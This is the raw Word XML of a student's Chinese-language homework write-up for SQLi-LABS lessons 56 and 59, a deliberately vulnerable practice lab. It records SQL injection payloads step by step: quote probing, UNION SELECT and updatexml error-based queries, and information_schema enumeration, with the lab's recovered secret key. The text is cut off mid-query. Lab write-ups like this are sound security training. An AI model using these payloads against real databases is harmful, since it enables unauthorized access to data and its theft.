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812A27A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2312</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1677</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>范舒舰</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-6月</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>web作业</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E91DF7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="402B701A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>SQLi-LABS-Less-56</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EB0C6D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先试用?id=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>探测是否包含单引号及是否是数字型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0345C6B0">
      <w:p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2437765" cy="1576070"/>
            <wp:effectExtent l="0" t="0" r="635" b="1143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437765" cy="157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D6A612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发现非数字型，且包含闭合符号，闭合符号可能包含单引号，不可使用报错注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A86340F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43FB7FD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再试用?id=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>探查是否包含双引号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0993AF42">
      <w:p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2520315" cy="1372870"/>
            <wp:effectExtent l="0" t="0" r="6985" b="1143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20315" cy="137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8CF72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返回查询结果，说明不包含双引号并且包含单引号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3143B35F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C683C7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再试用?id=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>)--+尝试闭合符号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C80A3E">
      <w:p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2517775" cy="1513205"/>
            <wp:effectExtent l="0" t="0" r="9525" b="1079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17775" cy="151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C3C4F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返回了正确结果，说明闭合是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BCFC12">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64D5D87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尝试使用union注入?id=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>)union select 1,2,3--+探测列数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3851388D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(使用?id=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>)order by 3--+/?id=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>)order by 4--+不会返回额外数据，多一次探测)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B115EE4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2336800" cy="1451610"/>
            <wp:effectExtent l="0" t="0" r="0" b="889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36800" cy="145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805C9">
      <w:p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得到有三列</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E27983E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77996814">
      <w:pPr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使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>?id=-1') union select 1,2,group_concat(concat(table_name,'~',column_name)) from information_schema.columns where table_schema='challenges'--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>+得到表名和列名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216FED0A">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="1420495"/>
            <wp:effectExtent l="0" t="0" r="10795" b="190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42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6CE4E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得到表名:1vqrc4alr5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188065C9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列名:secret_SMB2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9F2D21">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02094A6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之后直接使用?id=-1') union select 1,2,secret_SMB2 from challenges.1vqrc4alr5--+获得秘钥</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08030D5D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3242945" cy="1575435"/>
            <wp:effectExtent l="0" t="0" r="8255" b="1206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42945" cy="157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227727">
      <w:pPr>
        <w:jc w:val="both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获得秘钥:tTCMe8dHLBWlPK09Drq3i5dx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAF42C1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4197350" cy="1708785"/>
            <wp:effectExtent l="0" t="0" r="6350" b="571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97350" cy="170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DE077E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="5"/>
        <w:tblW w:w="86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12"/>
        <w:gridCol w:w="5045"/>
        <w:gridCol w:w="2018"/>
      </w:tblGrid>
      <w:tr w14:paraId="4820FA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12" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="4874CB" w:themeFill="accent1"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="34623AFE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i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>尝试次数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5045" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="4874CB" w:themeFill="accent1"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="34F5513F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i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>使用payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2018" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="4874CB" w:themeFill="accent1"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="284BC887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i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>使用payload原因</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4A8776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12" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="4874CB" w:themeColor="accent1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  <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="010C79B4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>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5045" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="4874CB" w:themeColor="accent1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  <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="6EE98511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>?Id=1</w:t>
            </w:r>
            <w:r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  <w:t>’</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2018" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="55CFD836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>获取闭合符号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="16CDA5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12" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="4874CB" w:themeColor="accent1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  <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="242E1766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>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5045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  <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="3BD431F2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?id=1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2018" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:tcBorders>
              <w:left w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="527632E1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</w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="631524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12" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="4874CB" w:themeColor="accent1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7FDE32C0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>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5045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3BAEC41A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?id=1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>’</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>)--+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2018" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:tcBorders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4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="18C32276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</w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1D7912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12" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="4874CB" w:themeColor="accent1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0AA6DBE8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>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5045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48E10583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?id=1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>’</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>)order by 3--+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2018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4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="727413AE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探测列数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="42AC2C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12" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="4874CB" w:themeColor="accent1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21CB62BA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>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5045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33F40C9D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?id=-1') union select 1,2,group_concat(concat(table_name,'~',column_name)) from information_schema.columns where table_schema='challenges'--</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2018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4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4AB7A2B4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得到表名和列名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="37AABE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12" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="4874CB" w:themeColor="accent1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401C3448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>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5045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4874CB" w:themeColor="accent1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71ED9456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?id=-1') union select 1,2,secret_SMB2 from challenges.1vqrc4alr5--+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2018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4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5B7E5EEA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获得秘钥</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1DD9761D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="293BA42C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>SQLi-LABS-Less-59</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AB28F6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先试用?id=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>探测是否包含单引号及是否是数字型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F8007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9230" cy="1247775"/>
            <wp:effectExtent l="0" t="0" r="127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2A7DDC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发现是数字型，无闭合符号，可以使用报错注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0922D7B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3524A8AD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使用报错注入?id=1 and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>updatexml(1,concat(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0x7e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>,(database())</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>,0x7e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>),1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>--+获取数据库名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>and连接updatexml(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>报错注入函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EE6AEF"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使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>concat(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0x7e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>,(database())</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>,0x7e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>正确且以~突出显示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>当前数据库名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6072FC37">
      <w:pPr>
        <w:ind w:firstLine="42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database() 返回当前数据库名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0140F767"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--+通用注释</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A722C4">
      <w:p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2880995" cy="1534795"/>
            <wp:effectExtent l="0" t="0" r="1905" b="190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80995" cy="153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234E0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得到库名为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>challenges</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFA8F7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ECADA9F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使用?id=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1)--+获取当前库所有表名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA673AF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select group_concat(table_name)聚合所有表名到一个字符串</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C918FF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from information_schema.tables从元数据表查询表信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02483DDD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where table_schema='challenges'限定查询当前数据库的表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CFF80A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center"/>
        <w:textAlignment w:val="auto"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3202940" cy="1369060"/>
            <wp:effectExtent l="0" t="0" r="10160" b="254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02940" cy="136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D50EF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得到表名'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>43k16pht7z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE8FBA1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</w:p>
    <w:p w14:paraId="0F896A2D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使用?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>43k16pht7z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>'),0x7e),1)--+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
